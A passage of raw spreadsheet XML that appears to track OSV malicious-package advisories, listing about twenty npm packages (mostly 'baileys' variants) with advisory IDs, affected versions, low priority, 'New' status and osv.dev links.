      <c r="S25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@kelvdra/baileys (npm), version(s): 1.0.6-rc.1, 1.0.6, 1.0.5-rc.3.</t>
        </is>
      </c>
      <c r="T255" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17362</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17363</t>
        </is>
      </c>
      <c r="D256" s="5" t="inlineStr"/>
      <c r="E256" s="5" t="inlineStr"/>
      <c r="F256" s="5" t="inlineStr"/>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="inlineStr"/>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K256" s="5" t="inlineStr"/>
      <c r="L256" s="5" t="inlineStr">
        <is>
          <t>npm:@kxa/xbails</t>
        </is>
      </c>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q256" s="5" t="inlineStr"/>
      <c r="R256" s="5" t="inlineStr"/>
      <c r="S25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@kxa/xbails (npm), version(s): 0.0.5.</t>
        </is>
      </c>
      <c r="T256" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17363</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17364</t>
        </is>
      </c>
      <c r="D257" s="5" t="inlineStr"/>
      <c r="E257" s="5" t="inlineStr"/>
      <c r="F257" s="5" t="inlineStr"/>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="inlineStr"/>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K257" s="5" t="inlineStr"/>
      <c r="L257" s="5" t="inlineStr">
        <is>
          <t>npm:@lendkzn/xntaabail</t>
        </is>
      </c>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q257" s="5" t="inlineStr"/>
      <c r="R257" s="5" t="inlineStr"/>
      <c r="S25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@lendkzn/xntaabail (npm), version(s): 7.0.0.</t>
        </is>
      </c>
      <c r="T257" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17364</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17365</t>
        </is>
      </c>
      <c r="D258" s="5" t="inlineStr"/>
      <c r="E258" s="5" t="inlineStr"/>
      <c r="F258" s="5" t="inlineStr"/>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="inlineStr"/>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K258" s="5" t="inlineStr"/>
      <c r="L258" s="5" t="inlineStr">
        <is>
          <t>npm:@lendxntaa/baileys</t>
        </is>
      </c>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q258" s="5" t="inlineStr"/>
      <c r="R258" s="5" t="inlineStr"/>
      <c r="S25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@lendxntaa/baileys (npm), version(s): 9.5.0, 9.3.0, 9.1.0, 9.0.2, 9.0.1.</t>
        </is>
      </c>
      <c r="T258" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17365</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17366</t>
        </is>
      </c>
      <c r="D259" s="5" t="inlineStr"/>
      <c r="E259" s="5" t="inlineStr"/>
      <c r="F259" s="5" t="inlineStr"/>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="inlineStr"/>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K259" s="5" t="inlineStr"/>
      <c r="L259" s="5" t="inlineStr">
        <is>
          <t>npm:@levvicode/baileys</t>
        </is>
      </c>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q259" s="5" t="inlineStr"/>
      <c r="R259" s="5" t="inlineStr"/>
      <c r="S25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@levvicode/baileys (npm), version(s): 0.0.3, 0.0.2.</t>
        </is>
      </c>
      <c r="T259" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17366</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17367</t>
        </is>
      </c>
      <c r="D260" s="5" t="inlineStr"/>
      <c r="E260" s="5" t="inlineStr"/>
      <c r="F260" s="5" t="inlineStr"/>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="inlineStr"/>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K260" s="5" t="inlineStr"/>
      <c r="L260" s="5" t="inlineStr">
        <is>
          <t>npm:@mikudeveloper/grace</t>
        </is>
      </c>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q260" s="5" t="inlineStr"/>
      <c r="R260" s="5" t="inlineStr"/>
      <c r="S26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@mikudeveloper/grace (npm), version(s): 2.0.1, 1.0.21, 1.0.20.</t>
        </is>
      </c>
      <c r="T260" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17367</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17368</t>
        </is>
      </c>
      <c r="D261" s="5" t="inlineStr"/>
      <c r="E261" s="5" t="inlineStr"/>
      <c r="F261" s="5" t="inlineStr"/>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="inlineStr"/>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K261" s="5" t="inlineStr"/>
      <c r="L261" s="5" t="inlineStr">
        <is>
          <t>npm:@mivesensei/baileys</t>
        </is>
      </c>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q261" s="5" t="inlineStr"/>
      <c r="R261" s="5" t="inlineStr"/>
      <c r="S26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@mivesensei/baileys (npm), version(s): 0.4.2.</t>
        </is>
      </c>
      <c r="T261" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17368</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17369</t>
        </is>
      </c>
      <c r="D262" s="5" t="inlineStr"/>
      <c r="E262" s="5" t="inlineStr"/>
      <c r="F262" s="5" t="inlineStr"/>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="inlineStr"/>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K262" s="5" t="inlineStr"/>
      <c r="L262" s="5" t="inlineStr">
        <is>
          <t>npm:@noxleyss/baileys</t>
        </is>
      </c>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q262" s="5" t="inlineStr"/>
      <c r="R262" s="5" t="inlineStr"/>
      <c r="S26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@noxleyss/baileys (npm), version(s): 1.1.10.</t>
        </is>
      </c>
      <c r="T262" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17369</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17370</t>
        </is>
      </c>
      <c r="D263" s="5" t="inlineStr"/>
      <c r="E263" s="5" t="inlineStr"/>
      <c r="F263" s="5" t="inlineStr"/>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="inlineStr"/>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K263" s="5" t="inlineStr"/>
      <c r="L263" s="5" t="inlineStr">
        <is>
          <t>npm:@nyzzpedia/baileys-new</t>
        </is>
      </c>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q263" s="5" t="inlineStr"/>
      <c r="R263" s="5" t="inlineStr"/>
      <c r="S26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@nyzzpedia/baileys-new (npm), version(s): 1.0.0.</t>
        </is>
      </c>
      <c r="T263" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17370</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17371</t>
        </is>
      </c>
      <c r="D264" s="5" t="inlineStr"/>
      <c r="E264" s="5" t="inlineStr"/>
      <c r="F264" s="5" t="inlineStr"/>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="inlineStr"/>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K264" s="5" t="inlineStr"/>
      <c r="L264" s="5" t="inlineStr">
        <is>
          <t>npm:@nyzzpediaa/baileys-new</t>
        </is>
      </c>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q264" s="5" t="inlineStr"/>
      <c r="R264" s="5" t="inlineStr"/>
      <c r="S26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@nyzzpediaa/baileys-new (npm), version(s): 1.0.12, 1.0.11, 1.0.10, 1.0.9, 1.0.8, 1.0.7, 1.0.6, 1.0.5, 1.0.4, 1.0.3, 1.0.2, 1.0.0.</t>
        </is>
      </c>
      <c r="T264" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17371</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17372</t>
        </is>
      </c>
      <c r="D265" s="5" t="inlineStr"/>
      <c r="E265" s="5" t="inlineStr"/>
      <c r="F265" s="5" t="inlineStr"/>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="inlineStr"/>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K265" s="5" t="inlineStr"/>
      <c r="L265" s="5" t="inlineStr">
        <is>
          <t>npm:@ostyado/baileys</t>
        </is>
      </c>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q265" s="5" t="inlineStr"/>
      <c r="R265" s="5" t="inlineStr"/>
      <c r="S26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@ostyado/baileys (npm), version(s): 2.0.9, 2.0.8, 2.0.7, 2.0.6.</t>
        </is>
      </c>
      <c r="T265" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17372</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17373</t>
        </is>
      </c>
      <c r="D266" s="5" t="inlineStr"/>
      <c r="E266" s="5" t="inlineStr"/>
      <c r="F266" s="5" t="inlineStr"/>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="inlineStr"/>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr">
        <is>
          <t>npm:@queenanya/baileys</t>
        </is>
      </c>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q266" s="5" t="inlineStr"/>
      <c r="R266" s="5" t="inlineStr"/>
      <c r="S26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@queenanya/baileys (npm), version(s): 9.10.1, 9.7.3-beta.1, 9.7.2.</t>
        </is>
      </c>
      <c r="T266" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17373</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17374</t>
        </is>
      </c>
      <c r="D267" s="5" t="inlineStr"/>
      <c r="E267" s="5" t="inlineStr"/>
      <c r="F267" s="5" t="inlineStr"/>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="inlineStr"/>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr">
        <is>
          <t>npm:@rennnpm/baileys</t>
        </is>
      </c>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q267" s="5" t="inlineStr"/>
      <c r="R267" s="5" t="inlineStr"/>
      <c r="S26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@rennnpm/baileys (npm), version(s): 1.0.0.</t>
        </is>
      </c>
      <c r="T267" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17374</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17375</t>
        </is>
      </c>
      <c r="D268" s="5" t="inlineStr"/>
      <c r="E268" s="5" t="inlineStr"/>
      <c r="F268" s="5" t="inlineStr"/>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="inlineStr"/>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr">
        <is>
          <t>npm:@revizahoshii/baileys</t>
        </is>
      </c>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q268" s="5" t="inlineStr"/>
      <c r="R268" s="5" t="inlineStr"/>
      <c r="S26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@revizahoshii/baileys (npm), version(s): 0.5.4, 0.5.3, 0.5.2, 0.5.1, 0.5.0, 0.4.2, 0.4.1, 0.4.0, 0.3.18.</t>
        </is>
      </c>
      <c r="T268" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17375</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17376</t>
        </is>
      </c>
      <c r="D269" s="5" t="inlineStr"/>
      <c r="E269" s="5" t="inlineStr"/>
      <c r="F269" s="5" t="inlineStr"/>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="inlineStr"/>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr">
        <is>
          <t>npm:@revizahoshii/hoshino</t>
        </is>
      </c>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q269" s="5" t="inlineStr"/>
      <c r="R269" s="5" t="inlineStr"/>
      <c r="S26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@revizahoshii/hoshino (npm), version(s): 1.1.0.</t>
        </is>
      </c>
      <c r="T269" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17376</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17377</t>
        </is>
      </c>
      <c r="D270" s="5" t="inlineStr"/>
      <c r="E270" s="5" t="inlineStr"/>
      <c r="F270" s="5" t="inlineStr"/>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="inlineStr"/>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K270" s="5" t="inlineStr"/>
      <c r="L270" s="5" t="inlineStr">
        <is>
          <t>npm:@saazkira/baileys</t>
        </is>
      </c>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q270" s="5" t="inlineStr"/>
      <c r="R270" s="5" t="inlineStr"/>
      <c r="S27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@saazkira/baileys (npm), version(s): 2.1.9, 2.1.8, 2.1.7, 2.1.6.</t>
        </is>
      </c>
      <c r="T270" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17377</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17378</t>
        </is>
      </c>
      <c r="D271" s="5" t="inlineStr"/>
      <c r="E271" s="5" t="inlineStr"/>
      <c r="F271" s="5" t="inlineStr"/>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="inlineStr"/>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K271" s="5" t="inlineStr"/>
      <c r="L271" s="5" t="inlineStr">
        <is>
          <t>npm:@sairidev/baileys-new</t>
        </is>
      </c>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q271" s="5" t="inlineStr"/>
      <c r="R271" s="5" t="inlineStr"/>
      <c r="S27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@sairidev/baileys-new (npm), version(s): 0.3.21.</t>
        </is>
      </c>
      <c r="T271" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17378</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17379</t>
        </is>
      </c>
      <c r="D272" s="5" t="inlineStr"/>
      <c r="E272" s="5" t="inlineStr"/>
      <c r="F272" s="5" t="inlineStr"/>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="inlineStr"/>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K272" s="5" t="inlineStr"/>
      <c r="L272" s="5" t="inlineStr">
        <is>
          <t>npm:@sakataoffc/baileys</t>
        </is>
      </c>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q272" s="5" t="inlineStr"/>
      <c r="R272" s="5" t="inlineStr"/>
      <c r="S27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@sakataoffc/baileys (npm), version(s): 8.0.0, 7.0.0, 6.0.0, 5.0.1, 5.0.0, 4.0.0, 3.0.0, 2.0.0, 1.0.0.</t>
        </is>
      </c>
      <c r="T272" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17379</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17380</t>
        </is>
      </c>
      <c r="D273" s="5" t="inlineStr"/>
      <c r="E273" s="5" t="inlineStr"/>
      <c r="F273" s="5" t="inlineStr"/>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="inlineStr"/>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K273" s="5" t="inlineStr"/>
      <c r="L273" s="5" t="inlineStr">
        <is>
          <t>npm:@teamolduser/baileys</t>
        </is>
      </c>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q273" s="5" t="inlineStr"/>
      <c r="R273" s="5" t="inlineStr"/>
      <c r="S27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@teamolduser/baileys (npm), version(s): 9.10.1, 9.7.3-beta.1, 9.7.2.</t>
        </is>
      </c>
      <c r="T273" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17380</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17381</t>
        </is>
      </c>
      <c r="D274" s="5" t="inlineStr"/>
      <c r="E274" s="5" t="inlineStr"/>
      <c r="F274" s="5" t="inlineStr"/>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="inlineStr"/>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K274" s="5" t="inlineStr"/>
      <c r="L274" s="5" t="inlineStr">
        <is>
          <t>npm:@wanzlonely/bails4u</t>
        </is>
      </c>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q274" s="5" t="inlineStr"/>
      <c r="R274" s="5" t="inlineStr"/>
      <c r="S27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@wanzlonely/bails4u (npm), version(s): 5.0.0, 4.0.0, 3.0.0, 2.0.0.</t>
        </is>
      </c>
      <c r="T274" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17381</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
